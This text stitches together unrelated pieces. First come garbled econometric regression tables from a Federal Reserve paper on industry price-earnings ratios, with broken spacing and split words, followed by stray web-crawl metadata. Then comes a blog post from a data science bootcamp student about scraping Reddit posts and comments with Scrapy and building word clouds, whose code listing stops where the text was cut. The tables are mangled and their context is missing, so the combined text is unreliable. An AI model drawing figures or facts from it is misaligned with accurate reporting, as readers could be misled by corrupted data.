Payout Rate
0.34 (0.05) -11.99 (0.63) -9.90 (4.02)
0.07 (0.03) -3.99 (0.78) 3.41 (1.92)
0.31 (0.08) -11.84 (0.52) -8.82 (3.27)
0.07 (0.04) -4.73 (0.67) 2.84 (1.78)
0.09 (0.04) -2.86 (0.57)
0.09 (0.04)
10-Year Treasury Yield
Risk Spread
Expected. Inflation
-5.18 (1.04) 0.75 (0.06) .706 .204 .910 .113 .714 .172 0.67 (0.05) .889 .107 0.65 (0.05) .893 .106 0.69 (0.06) .764 .085
Lagged PE (8)
Adj. R-Squ ared Root MSE
*801 sector-time observations on 11 sectors over 1983:Q2 to 2001:Q2 . Specifications (1) an d (2) are estimated w ith OLS; fixed industry effects are added in (3)-(6) by using OLS on industry mean-adju sted values; year dum mies are added in (6). New ey.
-24Table 3 Industry Portfolio Regressions: Dependent variable is the industry-level log PE ratio*
(1) Growth ($) $/(1-8) 5.39 (0.37) (2) 0.91 (0.16) 5.45 (3) 5.06 (0.36) (4) 1.36 (0.21) 4.53 (5) 1.20 (0.20) 3.96 (6) 1.00 (0.22) 3.88
Payout Rate
0.15 (0.02) -10.59 (0.54) -5.93 (3.33)
0.04 (0.01) -2.87 (0.27) 4.36 (1.30)
0.20 (0.02) -10.33 (0.38) -6.83 (2.13)
0.07 (0.01) -3.98 (0.28) 2.26 (1.31)
0.08 (0.01) -2.38 (0.30)
0.07 (0.01)
10-Year Treasury Yield
Risk Spread
Expected Inflation
-3.96 (0.67) 0.83 (0.02) .421 .311 .857 .155 .510 .226 0.71 (0.02) .792 .147 0.70 (0.02) .794 .146 0.74 (0.03) .699 .12
Lagged PE (8)
Adj. R-Squ ared Root MSE
*4057 industry-time observations on 66 industries over 1983:Q2-2001:Q2 Specification s (1) and (2) are estimated with OLS; fixed industry effects are added to (3)-(6), by using OLS on industry mean-adjusted values; year du mm ies are added in (6). Newey.
-25-
Table 4 Sector Growth Effects in Industry Portfolio Regressions
Coefficient on:
(1)
(4)
Industry Growth Sector Growth Total
4.35 1.87 6.22
3.62 3.40 7.02
Coefficients on growth forecast’s are all significant at the 1 percent level. Figures under specifications (4) refer to implied long-run effects of growth, analogous to those in column (4) of tables 2 and 3.
Table 5 Coefficients on Growth in Early & Late Samples
Sectors (1) (4)
Industries (1) (4)
1983-1991 1992-2001
6.1 10.0
2.9 10.6
4.0 6.5
2.3 4.5
Coefficients on growth forecast’s are all significant at the 1 percent level. Figures under specifications (4) refer to implied long-run effects of growth, analogous to those in column (4) of tables 2 and 3.
|
https://www.scribd.com/document/1350781/US-Federal-Reserve-200207pap
|
CC-MAIN-2018-34
|
refinedweb
| 8,465
| 51.48
|
public class MyTestClass {
public static void main(String[] args) {
new MyTestClass().myMethod();
}
public void myMethod(){
{
//do something
}
{
//do something
}
{
//do something
}
}//method close
}//class close
It is not common practice to do this kind of thing, and I wouldn't do it normally.
Those inner blocks ( i.e.
{ ... } ) can serve a couple of purposes:
Blocks limit the scope of any variables declared within them; e.g.
public void foo() { int i = 1; { int j = 2; } // Can't refer to the "j" declared here. But can declare a new one. int j = 3; }
However, I wouldn't recommend doing this. IMO, it's better to use different variable names OR refactor the code into smaller methods. Either way, most Java programmers would regard the
{ and
} as annoying visual clutter.
Blocks can be used to attach labels.
HERE : { ... break HERE; // breaks to the statement following the block ... }
However, in practice you hardly ever see labelled break statements. And because they are so unusual, they tend to render the code less readable.
|
https://codedump.io/share/EDSYsGEXdIb7/1/multiple-open-and-close-curly-brackets-inside-method---java
|
CC-MAIN-2018-26
|
refinedweb
| 169
| 75.81
|
Unanswered: infinite scroll grid height
Unanswered: infinite scroll grid height
Is there a way to have the height of an infinite scroll grid shrink to fit the number of rows when the store returns fewer records than would be required to fill the configured height?
- Join Date
- Jul 2010
- Location
- Houston, Tx
- 8,617
- Answers
- 612
- Vote Rating
- 396
Not that I am aware of. I have used the following in previous apps, perhaps it may help:
Code:
// call on grid.afterlayout / resize calculatePageSize: function() { if (!this.rendered) { return false; } var row = this.view.getRow(0); var rowHeight; if (!row) { rowHeight = 41; } else { rowHeight = Ext.get(row).getHeight(); } var height = this.getView().scroller.getHeight(); var ps = Math.floor(height / rowHeight); return (ps > 1 ? ps : false); },
Scott.
I have the same problem. And searching for a solution.
@Scott, it seems that your code is Ext 3.x, the functions you are using are not available anymore. If someone has a tip on how to access a row EL from the view I guess one could reuse your code, but I couldn't see a way to do it. Dom-Query perhaps?
|
http://www.sencha.com/forum/showthread.php?214896-infinite-scroll-grid-height
|
CC-MAIN-2014-15
|
refinedweb
| 190
| 85.89
|
I finish the part of finding the char at the position my homework required, but how to delete the character from a String that I found?
removeNchars takes a String, an int and a char and returns a String: The output string is the same as the input string except that the first n occurrences of the input char are removed from the string, where n represents the input integer. If there are not n occurrences of the input character, then all occurrences of the character are removed. Do not use
arrays to solve this problem.
HW2.removeNchars("Hello there!", 2, 'e') "Hllo thre!"
HW2.removeNchars("Hello there!", 10, 'e') "Hllo thr!"
HW2.removeNchars("Hello there!", 1, 'h') "Hello tere!"
public class HW2{ public static String removeNchars(String s, int a, char b){ StringBuilder s = new StringBuilder(); for(int i = 0; i<s.length(); i++){ if(int i=a&& s.charAr(i)==b){ } } } }
there is more than 1 way to do it. I can see you used StringBuilder so try this
the idea is to define string builder
StringBuilder sb = new StringBuilder(inputString);
use
deleteCharAt() to delete the char you don't want(docs).
and convert it back to string
String resultString = sb.toString();
good luck
Edit:
You can also create a new
StringBuilder(exmple name output) then iterate the src string and append the chars you don't want to remove to the output string with
.append(input);
something like this:
StringBuilder output = new StringBuilder(); output.append(char);
and return the output string after you finish iterating.
Python Remove Character from String, How do I extract a character from a string in Java? Thanks. I will try this first thing in the morning and see if my compiler likes it. The DB-NAME field on each record in my file can have up to 200 characters. So, I guess I'll need to search starting at the first character of the DB-NAME field and increment the starting position in the DB-NAME by 1 until the end of that string.
I don't know why you are using the StringBuilder class,but as you stated above i think this will help you with your homework,lets see if it works for you.
public static String removeNchars(String s, int a, char b){ String str = ""; for(int i = 0; i < s.length(); i++){ if(a > 0 && s.charAt(i) == b) { a--; }else { str += s.charAt(i); } } return str; }
How To Count Occurrences Of Each Character In String In Java, How do I remove a single character from a string in Python? Macro Example to Replace Character in String by Position. The following macro replaces the string starting in position 10 (myCharacterPosition) with a length of 1 character (myCharactersToReplace) with the string “+” (myReplacementString) within the string in cell A11 of the worksheet named “Excel VBA Replace” (myCell).
You can use
s.deleteCharAt(); like this:
public class HW2{ public static String removeNchars(String s, int a, char b){ StringBuilder s = new StringBuilder(); for(int i = 0; i<s.length(); i++){ if(int i=a&& s.charAr(i)==b) s.deleteCharAt(i); } } }
Delete substrings between start and end points, How do you count the number of occurrences of a character in a string in Java?.
Discussion 4-13, If str is a string array or a cell array of character vectors, then eraseBetween Create string arrays and delete substrings between start and end positions that are eraseBetween returns the boundaries as part of the output string array when they are exclusive. Calculate with arrays that have more rows than fit in memory.:
7. Strings, Another suggestion for a small part: Compute the sum of all the money, but don't chars are written in c++ using single quotes (strings are written using double quotes). You can cout variables of type char and it works as you would expect. cout << "My word is \"Aquarium\", and the character in position " << pos << " is Output: First non-repeating character is f. Can this be done by traversing the string only once? The above approach takes O(n) time, but in practice, it can be improved. The first part of the algorithm runs through the string to construct the count array (in O(n) time).
Java String exercises, Practice and solution., So far we have seen five types: int, float, bool, NoneType and str. want to treat a compound data type as a single thing, or we may want to access its parts. The len function returns the number of characters in a string: for char in fruit: print char __doc__ find(s, sub [,start [,end]]) -> in Return the lowest index in s where).
|
http://thetopsites.net/article/58263759.shtml
|
CC-MAIN-2020-34
|
refinedweb
| 777
| 71.04
|
🌄 How to make weather station (Arduino project)
We will need:
- Arduino UNO or another compatible card;
- temperature and humidity sensor DHT11 or other;
- pressure sensor BMP085 or more modern BMP180, or another;
- MQ135 carbon dioxide sensor (optional);
- LCD display 1602 or other;
- 10 kΩ potentiometer;
- the case for weather station;
- a piece of foiled fiberglass;
- screws for fastening components;
- connecting wires;
- power supply connector;
- soldering iron.
Instructions for creating a home weather station on Arduino
Selection of the case for the future weather station
First, you need to find a suitable case. There must fit all the components of the future room weather station. Such enclosures are sold in many electronics stores. Or use any other enclosure that you can find.
Estimate how all components will be placed inside. Cut through the window to secure the LCD display if it is not there. If you place a carbon dioxide sensor inside that is hot enough, place it on the side opposite to other sensors or make it remote. Provide a hole for the power connector.
Components Used
- The 1602 LCD display uses 6 Arduino + 4 pins for power (backlight and sign synthesizer).
- DHT11 temperature and humidity sensor connected to any digital pin. To read the values we will use the DHT11 library.
- The pressure sensor BMP085 is connected via I2C interface to two Arduino pins: SDA - to analog pin A4 and SCL - to analog pin A5. Note that for the power supply the sensor is supplied with a voltage of +3.3 V.
- The carbon dioxide sensor MQ135 is connected to one of the analog pins.
In principle, to assess the meteorological conditions, it is sufficient to have data on temperature, humidity, and atmospheric pressure, and a carbon dioxide sensor is not necessary.
Using all 3 sensors, we will have 7 digital and 3 analog pins of Arduino, not counting the power supply, of course.
Connection diagram of the weather station components
The scheme of the weather station is shown in the figure. It's all clear.
Sketch weather station
Let's write a sketch for Arduino. The code whenever possible is supplied with detailed comments.
#include <dht11.h> #include <LiquidCrystal.h> #include <Wire.h> #include <MQ135.h> LiquidCrystal lcd(12, 11, 5, 4, 3, 2); dht11 sensorTempHumid; MQ135 gasSensor = MQ135(A0); #define RZERO 76.63 float rzero; float ppm; int del = 5000; const unsigned char OSS = 0; int ac1; int ac2; int ac3; unsigned int ac4; unsigned int ac5; unsigned int ac6; int b1; int b2; int mb; int mc; int md; long b5; float temperature; long pressure; const float p0 = 101325; const float currentAltitude = 179.5; const float ePressure = p0 * pow((1 - currentAltitude/44330), 5.255); float weatherDiff; #define DHT11PIN 9 #define BMP085_ADDRESS 0x77 void setup() { lcd.begin(16, 2); Wire.begin(); bmp085Calibration(); } void loop() { int chk = sensorTempHumid.read(DHT11PIN); switch (chk) { case DHTLIB_OK: lcd.clear(); break; case DHTLIB_ERROR_CHECKSUM: lcd.clear(); lcd.print("Checksum error"); delay(del); return; case DHTLIB_ERROR_TIMEOUT: lcd.clear(); lcd.print("Time out error"); delay(del); return; default: lcd.clear(); lcd.print("Unknown error"); delay(del); return; } temperature = bmp085GetTemperature(bmp085ReadUT()); temperature *= 0.1; pressure = bmp085GetPressure(bmp085ReadUP()); pressure *= 0.01; weatherDiff = pressure - ePressure; rzero = gasSensor.getRZero(); ppm = gasSensor.getPPM(); lcd.setCursor(0, 0); lcd.print(pressure*3/4); lcd.print("mmHg "); if(weatherDiff > 250) lcd.print("Sun"); else if ((weatherDiff <= 250) || (weatherDiff >= -250)) lcd.print("Cloudy"); else if (weatherDiff > -250) lcd.print("Rain"); lcd.setCursor(0, 1); lcd.print(temperature, 1); lcd.print("C "); lcd.print(sensorTempHumid.humidity); lcd.print("% "); lcd.print(ppm); delay(del); lcd.clear(); }); } short bmp085GetTemperature(unsigned int ut) { long x1, x2; x1 = (((long)ut - (long)ac6)*(long)ac5) >> 15; x2 = ((long)mc << 11)/(x1 + md); b5 = x1 + x2; return ((b5 + 8)>>4); } long bmp085GetPressure(unsigned long up) { long x1, x2, x3, b3, b6, p; unsigned long b4, b7; b6 = b5 - 4000; x1 = (b2 * (b6 * b6)>>12)>>11; x2 = (ac2 * b6)>>11; x3 = x1 + x2; b3 = (((((long)ac1)*4 + x3)<<OSS) + 2)>>2;; } unsigned int bmp085ReadUT() { unsigned int ut; Wire.beginTransmission(BMP085_ADDRESS); Wire.write(0xF4); Wire.write(0x2E); Wire.endTransmission(); delay(5); ut = bmp085ReadInt(0xF6); return ut; } unsigned long bmp085ReadUP() { unsigned char msb, lsb, xlsb; unsigned long up = 0; Wire.beginTransmission(BMP085_ADDRESS); Wire.write(0xF4); Wire.write(0x34 + (OSS<<6)); Wire.endTransmission(); delay(2 + (3<<OSS)); Wire.beginTransmission(BMP085_ADDRESS); Wire.write(0xF6); Wire.endTransmission(); Wire.requestFrom(BMP085_ADDRESS, 3); while(Wire.available() < 3); msb = Wire.read(); lsb = Wire.read(); xlsb = Wire.read(); up = (((unsigned long) msb << 16) | ((unsigned long) lsb << 8) | (unsigned long) xlsb) >> (8-OSS); return up; } char bmp085Read(unsigned char address) { unsigned char data; Wire.beginTransmission(BMP085_ADDRESS); Wire.write(address); Wire.endTransmission(); Wire.requestFrom(BMP085_ADDRESS, 1); while(!Wire.available()); return Wire.read(); }); }
Load this sketch into the memory of the Arduino board controller.
Assembling weather station
We will make a printed circuit board for placing components inside the case - this is the most convenient solution for building and connecting sensors. For the manufacture of PCB at home, I use "laser-iron" technology (we described it in detail in previous articles) and etching with citric acid. We will provide places on the board for jumpers (“jumpers”) in order to be able to turn off the sensors. This will be useful if you need to reprogram the microcontroller when there is a desire to modify the program.
With the help of soldering install pressure sensors and gases.
To install the Arduino Nano, it is convenient to use special adapters or sockets with a 2.54 pitch. But in the absence of these parts and because of the space savings inside the case, I will install the Arduino also by soldering.
The thermal sensor will be located at some distance from the board and will be insulated from the inside of the meteorological station using a special insulating gasket.
Provide space for external power supply to our homemade board. I will use a regular 5-volt charger from an old broken router. Plus 5 volts from the charger will be fed to the pin Vin of the Arduino board.
The LCD screen will be screwed directly to the body, to the front. It will be connected with wires with Dupont type quick connectors.
Install the printed circuit board inside the case and fasten it with screws. Connect the LCD screen to the Arduino's legs according to the diagram.
Carefully close the weather station housing.
Turn on the weather station
Once again, re-checking that everything is connected correctly, we are energizing our weather station. The LCD screen should light up, and after a few seconds, it will display pressure data, a small forecast based on pressure readings, as well as data on temperature, humidity and carbon dioxide concentration.
Findings
We have assembled a home weather station from inexpensive and affordable components. In the process of working on a meteorological station, we became acquainted with the basics of interaction with temperature and humidity sensors, an atmospheric pressure sensor and a carbon dioxide sensor.
Add a comment
|
https://inventr.io/blogs/arduino/how-to-make-weather-station-arduino-project
|
CC-MAIN-2020-16
|
refinedweb
| 1,161
| 58.08
|
Running in parallel¶
PyClaw can be run in parallel on your desktop or on large supercomputers using the PETSc library. Running your PyClaw script in parallel is usually very easy; it mainly consists of replacing:
from clawpack import pyclaw
with:
import clawpack.petclaw as pyclaw
Also, most of the provided scripts in pyclaw/examples are set up to run in parallel simply by passing the command-line option use_petsc=True (of course, you will need to launch them with mpirun.
Installing PETSc¶
First make sure you have a working install of PyClaw. For PyClaw installation instructions, see installation.
To run in parallel you’ll need:
Obtaining PETSc:
PETSc 3.3 can be obtained using three approaches. Here we use Mercurial to get it. Look at for more information.
Do:
$ cd path/to/the/dir/where/you/want/download/Petsc-3.3 $ hg clone petsc-3.3 $ hg clone petsc-3.3/config/BuildSystem
For sh, bash, or zsh shells add the following lines to your shell start-up file:
$ export PETSC_DIR=path/to/the/dir/where/you/downloaded/Petsc-3.3/petsc-3.3 $ export PETSC_ARCH=your/architecture
whereas for csh/tcsh shells add the following lines to your shell start-up file:
$ setenv PETSC_DIR path/to/the/dir/where/you/downloaded/Petsc-3.3/petsc-3.3 $ setenv PETSC_ARCH your/architecture
For more information about PETSC_DIR and PETSC_ARCH, i.e. the variables that control the configuration and build process of PETSc, please look at.
Then, if you want PETSc-3.3 configure for 32-bit use the following command:
$ ./config/configure.py --with-cc=gcc --with-cxx=g++ --with-python=1 --download-mpich=1 --with-shared-libraries=1
whereas, if you want PETSc-3.3 64-bit do:
$ ./config/configure.py --with-cc=gcc --with-cxx=g++ --with-python=1 --download-mpich=1 --with-shared-libraries=1 --with-64-bit-indices=1
Note that one of the option is –download-mpich=1. This means that mpich is downloaded. If you do not need/want mpich, remove this option. Note that you need MPI when using PETSc. Therefore, if the option –download-mpich=1 is removed you should have MPI installed on your system or in your user account.
Once the configuration phase is completed, build PETSc libraries with
$ make PETSC_DIR=path/to/the/dir/where/you/have/Petsc-3.3/petsc-3.3 PETSC_ARCH=your/architecture all
Check if the libraries are working by running
$ make PETSC_DIR=path/to/the/dir/where/you/have/Petsc-3.3/petsc-3.3 PETSC_ARCH=your/architecture test
Obtaining petsc4py:
petsc4py is a python binding for PETSc. We recommend installing petsc4py 3.3 because it is compatible with PETSc 3.3 and 3.2. To install this binding correctly make sure that the PETSC_DIR and PETSC_ARCH are part of your shell start-up file.
Obtain petsc4py-3.3 with mercurial:
$ cd path/to/the/dir/where/you/want/download/petsc4py $ hg clone -r 3.3
The prefered method for the petsc4py iinstallation is pip
$ cd petsc4py-3.3 $ pip install . --user
Indeed, pip removes the old petsc4py installation, downloads the new version of cython (if needed) and installs petsc4py.
To check petsc4py-3.3 installation do:
$ cd petsc4py-3.3/test $ python runtests.py
All the tests cases should pass, i.e. OK should be printed at the screen.
NOTE: To run a python code that uses petsc4py in parallel you will need to use mpiexec or mpirun commands. It is important to remember to use the mpiexec or mpirun executables that come with the MPI installation that was used for configuring PETSc installation. If you have used the option –download-mpich=1 while installing PETSc, then the correct mpiexec to use is the one in ${PETSC_DIR}/${PETSC_ARCH}/bin. You can set this mpiexec to be your default by adding this line to your sh, bash, or zsh shell start-up file:
$ export PATH="${PETSC_DIR}/${PETSC_ARCH}/bin:${PATH}"
or this line in case you are using csh or tcsh shells:
$ setenv PATH "${PETSC_DIR}/${PETSC_ARCH}/bin:${PATH}"
You can test that you are using the right mpiexec by running a demonstration script that can be found in $PYCLAW/demo as follows:
$ cd $PYCLAW $ mpiexec -n 4 python demo/petsc_hello_world.py
and you should get an output that looks like follows:
Hello World! From process 3 out of 4 process(es). Hello World! From process 1 out of 4 process(es). Hello World! From process 0 out of 4 process(es). Hello World! From process 2 out of 4 process(es).
NOTE: An alternative way to install petsc4py is simply using the python script setup.py inside petsc4py, i.e.
$ cd petsc4py-dev $ python setup.py build $ python setup.py install --user
Testing your installation¶
If you don’t have it already, install nose
$ easy_install nose
Now simply execute
$ cd $PYCLAW $ nosetests
If everything is set up correctly, this will run all the regression tests (which include pure python code and python/Fortran code) and inform you that the tests passed. If any fail, please post the output and details of your platform on the claw-users Google group.
Running and plotting an example¶
$ cd $PYCLAW/examples/advection/1d/constant $ python advection.py use_PETSc=True iplot=1
This will run the code and then place you in an interactive plotting shell. To view the simulation output frames in sequence, simply press ‘enter’ repeatedly. To exit the shell, type ‘q’. For help, type ‘?’ or see this Clawpack interactive python plotting help page.
Tips for making your application run correctly in parallel¶
Generally serial PyClaw code should “just work” in parallel, but if you are not reasonably careful it is certainly possible to write serial code that will fail in parallel.
Most importantly, use the appropriate grid attributes. In serial, both grid.n and grid.ng give you the dimensions of the grid (i.e., the number of cells in each dimension). In parallel, grid.n contains the size of the whole grid, while grid.ng contains just the size of the part that a given process deals with. You should typically use only grid.ng (you can also use q.shape[1:], which is equal to grid.ng).
Similarly, grid.lower contains the lower bounds of the problem domain in the computational coordinates, whereas grid.lowerg contains the lower bounds of the part of the grid belonging to the current process. Typically you should use grid.lowerg.
Additionally, be aware that when a Grid object is instantiated in a parallel run, it is not instantiated as a parallel object. A typical code excerpt looks like
>>> import clawpack.petclaw as pyclaw >>> from clawpack import pyclaw >>> mx = 320; my = 80 >>> x = pyclaw.Dimension('x',0.0,2.0,mx) >>> y = pyclaw.Dimension('y',0.0,0.5,my) >>> grid = pyclaw.Domain([x,y])
At this point, grid.ng is identically equal to grid.n, rather than containing the size of the grid partition on the current process. Before using it, you should instantiate a State object
>>> num_eqn = 5 >>> num_aux=1 >>> state = pyclaw.State(grid,num_eqn,num_aux)
Now state.grid.ng contains appropriate information.
Passing options to PETSc¶
The built-in applications (see Working with PyClaw’s built-in examples) are set up to automatically pass command-line options starting with a dash (“-“) to PETSc.
|
http://www.clawpack.org/pyclaw/parallel.html
|
CC-MAIN-2021-49
|
refinedweb
| 1,216
| 60.21
|
Created on 2007-09-05 10:53 by danilo, last changed 2009-02-15 04:47 by steven.daprano. This issue is now closed.
Seems like doctest won't recognize functions inside the module under
test are actually in that module, if the function is decorated by a
decorator that wraps the function in an externally defined function,
such as in this silly example:
# decorator.py
import functools
def simplelog(f):
@functools.wraps(f)
def new_f(*args, **kwds):
print "Wrapper calling func"
return f(*args, **kwds)
return new_f
# test.py
from decorator import simplelog
@simplelog
def test():
"""
This test should fail, since the decorator prints output.
Seems I don't get called though
>>> test()
'works!'
"""
return "works!"
if __name__ == '__main__':
import doctest
doctest.testmod()
--
The problem lies in DocTestFinder._from_module, which checks if the
function's func_globals attribute is the same as the module's __dict__
attribute.
I'd propose to do the __module__/inspect.getmodule() checks (aren't they
both checking the same thing btw?) before the inspect.isfunction check.
Here's a patch that alters the order of checks in DocTestFinder._from_module
I applied this patch to my trunk sandbox. It seems to solve the problem
I just encountered where doctests are hidden in decorated functions &
tests pass. Checked in as r67277. Should be backported to 2.6 and
forward ported to 3.0.
For what it's worth, this bug appears to go back to at least Python 2.4,
and it affects functions using decorators even if they are defined in
the same module as the decorated function. I've applied the patch to my
2.4 installation, and it doesn't fix the issue. I'd like to request this
be reopened, because I don't believe the patch works as advertised.
I've attached a simple script which should demonstrate the issue. Run it
with "python doctestfail.py [-v]", and if it passes with no failures,
the bug still exists. I've tested it on 2.4 before and after the patch.
(Apologies for not having anything more recent at the moment.)
Earlier I wrote:
"I've applied the patch to my 2.4 installation, and it doesn't fix the
issue. I'd like to request this be reopened, because I don't believe the
patch works as advertised."
Nevermind, I withdraw the request. I believe I was mislead due to the
decorated function not having it's docstring automatically copied from
the original without the use of functools.wraps().
|
http://bugs.python.org/issue1108
|
CC-MAIN-2015-11
|
refinedweb
| 417
| 69.18
|
# Practicalities of deploying dockerized ASP.NET Core application to Heroku
### Intro
.NET is a relative newcomer in the open-source world, and its popularity is nowhere near mainstream platforms like Node.js. So you can imagine there're few tutorials that deal with .NET and frameworks such as ASP.NET on Heroku. And those that do, probably won't use containers.

Do you see C#/.NET here? Yes, me neither.
### Getting started
This tutorial will assume you have Docker, .NET Core and Heroku tools installed. I will use Linux (Ubuntu), but AFAIK those tools are cross-platform so the steps will be the same for any supported OS.
Let's take the easiest case — simple MVC app. If you don't have one, just create it by running
```
dotnet new mvc --name mymvc
```
I'll also assume you have a dockerfile ready, maybe something like proposed in [this tutorial](https://docs.docker.com/engine/examples/dotnetcore/):
```
FROM mcr.microsoft.com/dotnet/core/sdk:2.2 AS builder
WORKDIR /sources
COPY *.csproj .
RUN dotnet restore
COPY . .
RUN dotnet publish --output /app/ --configuration Release
FROM mcr.microsoft.com/dotnet/core/aspnet:2.2
WORKDIR /app
COPY --from=builder /app .
CMD ["dotnet", "MyMvc.dll"]
```
Note how ENTRYPOINT was substituted with CMD — more on that later.
So, cd to your app's folder and let's begin.
1. Login to Heroku container registry.
```
heroku container:login
```
2. If you don't have existing git repo, `git init` a new one
3. Run `heroku create` to create a new app, note the git repo address provided, e.g.
```
Creating salty-fortress-4191... done, stack is heroku-16
https://salty-fortress-4191.herokuapp.com/ | https://git.heroku.com/salty-fortress-4191.git
```
4. (Optional) Check that you have heroku remote by running `git remote -v`
5. Tell Heroku to use containers:
```
heroku stack:set container
```
6. Create heroku.yml file. Minimalistic version is something like:
```
build:
docker:
web: Dockerfile
```
7. By default ASP.NET core runs on port 5000 and 5001 (https). Heroku won't allow that. If you try running it as-is, Kestrel won't start, throwing an exception:
```
System.Net.Sockets.SocketException (13): Permission denied
```
Heroku seems to allow you app to listen on port specified in `$PORT` environment variable. So you need to ensure your app listens on that, rather than default one. In case you're using the default app, just substitute `CreateWebHostBuilder` with the following one in `Program.cs`:
```
public static IWebHostBuilder CreateWebHostBuilder(string[] args)
{
var port = Environment.GetEnvironmentVariable("PORT");
return WebHost.CreateDefaultBuilder(args)
.UseStartup()
.UseUrls("http://\*:"+port);
}
```
8. Commit everything:
```
git add . && git commit -m 'Meaningful commit message'
```
9. Now push the code to get container built and released (fingers crossed):
```
git push heroku master
```
Now remember when ENTRYPOINT was substituted with CMD in dockerfile? We don't pass any arguments to container, so `ENTRYPOINT ["dotnet", "MyMvc.dll"]` and `CMD ["dotnet", "MyMvc.dll"]` should behave similarly. But if you leave ENTRYPOINT, you'll get an error:

What a great error — "Unexpected fomation update response status"! Really tells you the root of the problem.
The real problem is that when using minimalist `heroku.yml` that I showed above, Heroku will expect CMD instruction in your dockerfile. When you add it, everything should work just fine.
### Conclusion
Now you should have some idea how to deploy simple ASP.NET Core apps to Heroku. Is it intuitive? Absolutely not. Is Heroku the best platform to host your .NET apps? Probably not. But as it's easy to sign up there and the most basic plan is free — maybe you might want to host something there, just for fun.
### References
1. <https://devcenter.heroku.com/articles/container-registry-and-runtime>
2. <https://devcenter.heroku.com/articles/build-docker-images-heroku-yml>
3. <https://docs.docker.com/engine/examples/dotnetcore/> (Dockerfile)
|
https://habr.com/ru/post/450904/
| null | null | 666
| 53.37
|
Update /new/ headline to match /choose/
VERIFIED FIXED
Status
People
(Reporter: ckprice, Assigned: espressive)
Tracking
Firefox Tracking Flags
(Not tracked)
Attachments
(1 attachment)
In bug 1205357, we developed a campaign download page[0]. This bug is opened to update the headline on /new/ to match that page. The reason is that we want to create a consistent message for users who may have seen some of our ad executions, and come to /new/ page via organic, or direct. cmore adds further benefits[1] of making it par for the course of always updating /new/ to match any campaign headlines moving forward. The headline is: Take Control. Choose Firefox. And it's localized on /choose/. There is a bit of complexity here as we would like to move over the localizations from /choose/. [0] [1]cmore re: this headline, and moving forward. My generally opinion is that we should be keeping alignment in our messages, voice, and copy across all touch-points regardless if the audience is someone who is attributed to a campaign or not. This came up during our onboarding summit that we have lots of carry-over messages and themes from past campaigns lingering around over time and people stumble upon them. Given that 90% of our campaign visitors are being acquired via view-through conversions, that means they are simply searching on "firefox" or going to firefox.com and they see the personal/independent messages on the Firefox download page instead of the "Take Control" theme.
Assignee: nobody → schalk.neethling.bugs
Whiteboard: [kb=1895778]
:flod Currently the /new page's headline block looks as follows: {% if LANG == 'en-US' %} {# L10n: Line break below for visual formatting only. #} {{ _('When it’s personal,<br>choose Firefox.') }} {% elif l10n_has_tag('fx10_independent') %} {{ _('Choose Independent.') }} <br> {{ _('Choose Firefox.') }} {% else %} {{_('Committed to you, your privacy and an open Web')}} {% endif %} Seeing that the headline text we want to change it to now is localized, we obviously do not want to stick it into the LANG == 'en-US' conditional so, I am thinking the above would become: {% if l10n_has_tag('tracking_protection') %} {# L10n: Line break below for visual formatting only. #} { _('Take Control.<br> Choose Firefox.') }} {% elif l10n_has_tag('fx10_independent') %} {{ _('Choose Independent.') }} <br> {{ _('Choose Firefox.') }} {% else %} {{_('Committed to you, your privacy and an open Web')}} {% endif %} You agree? Can we clean the tags up more? Thanks!
Flags: needinfo?(francesco.lodolo)
There is a syntax error in the above :-/ Should be: {{ _('Take Control.<br> Choose Firefox.') }}
Sounds good to me.
Flags: needinfo?(francesco.lodolo)
Created attachment 8687071 [details] [review] Link to Github pull-request:
Commits pushed to master at Fix Bug 1224299, update /new headline to match that of /choose Merge pull request #3560 from schalkneethling/bug1224299-update-new-page-headline-to-match-choose Fix Bug 1224299, update /new headline to match that of /choose
Status: NEW → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → FIXED
Verified FIXED: headlines of "Take Control. Choose Firefox." exist and match on both and
Status: RESOLVED → VERIFIED
|
https://bugzilla.mozilla.org/show_bug.cgi?id=1224299
|
CC-MAIN-2018-51
|
refinedweb
| 501
| 63.39
|
atexit - register a function to run at process termination
#include <stdlib.h> int atexit(void (*func)(void));
The atexit() function registers the function pointed to by func to be called without arguments. At normal process termination, functions registered by atexit() are called in the reverse order to that in which they were registered. Normal termination occurs either by a call to exit() or a return from main().
At least 32 functions can be registered with atexit().
After a successful call to any of the exec functions, any functions previously registered by atexit() are no longer registered.
Upon successful completion, atexit() returns 0. Otherwise, it returns().
None.
exit(), sysconf(), <stdlib.h>.
Derived from the ANSI C standard.
|
http://pubs.opengroup.org/onlinepubs/7908799/xsh/atexit.html
|
CC-MAIN-2018-39
|
refinedweb
| 116
| 60.11
|
Contributed by Daniel Donohue. Daniel took NYC Data Science Academy 12 week full time Data Science Bootcamp pr... between Sept 23 to Dec 18, 2015. The post was based on his third class project(due at 6th week of the program).
For our third project here at NYC Data Science, we were tasked with writing a web scraping script in Python. Since I spend (probably too much) time on Reddit, I decided that it would be the basis for my project. For the uninitiated, Reddit is a content-aggregator, where users submit text posts or links to thematic subforums (called "subreddits"), and other users vote them up or down and comment on them. With over 36 million registered users and nearly a million subreddits, there is a lot of content to scrape.
I selected ten subreddits---five of the top subreddits by number of subscribers and five of my personal favorites---and scraped the top post titles, links, date and time of the post, number of votes, and the top rated comment on the comment page for that post. The ten subreddits were:
There are many Python packages that would be adequate for this project, but I ended up using Scrapy. It seemed to be the most versatile among the different options, and it provided easy support for exporting scraped data to a database. Once I had the data stored in a database, I wrote the post title and top comment to txt files, and used the wordcloud module to generate word clouds for each of the subreddits.
When you start a new project, Scrapy creates a directory with a number of files. Each of these files rely on one another. The first file, items.py, defines containers that will store the scraped data:
from scrapy import Item, Field
class RedditItem(Item):
subreddit = Field()
link = Field()
title = Field()
date = Field()
vote = Field()
top_comment = Field()
Once filled, the item essentially acts as a Python dictionary, with the keys being the names of the fields, and the values being the scraped data corresponding to those fields.
The next file is the one that does all the heavy lifting---the file defining a Spider class. A Spider is a Python class that Scrapy uses to define what pages to start at, how to navigate them, and how to parse their contents to extract items. First, we have to import the modules we use in the definition of the Spider class:
import re
from bs4 import BeautifulSoup
from scrapy import Spider, Request
from reddit.items import RedditItem
The first two imports are merely situational; we'll use regex to get the name of the subreddit and BeautifulSoup to extract the text of the top comment. Next, we import spider.Spider, from which our Spider will inherit, and spider.Request, which will lend Request objects from HTTP requests. Finally, we import our Item class we defined in items.py.
The next task is to give our Spider a place to start crawling.
class RedditSpider(Spider):
name = 'reddit'
allowed_domains = ['reddit.com']
start_urls = ['',
'',
'',
'',
'',
'',
'',
'',
'',
'']
